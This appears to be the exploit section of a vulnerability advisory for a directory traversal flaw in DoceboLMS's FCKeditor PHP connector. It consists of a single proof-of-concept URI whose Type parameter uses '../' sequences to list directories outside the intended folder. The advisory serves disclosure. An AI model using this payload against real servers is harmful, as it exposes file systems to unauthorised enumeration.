• info
• discussion
• exploit
• solution
• references

DoceboLMS Connector.PHP Directory Traversal Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/addons/fckeditor2rc2/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder=